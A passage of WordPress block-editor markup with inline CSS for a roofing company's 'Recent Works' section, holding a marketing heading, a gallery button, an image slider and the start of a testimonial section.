{\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading 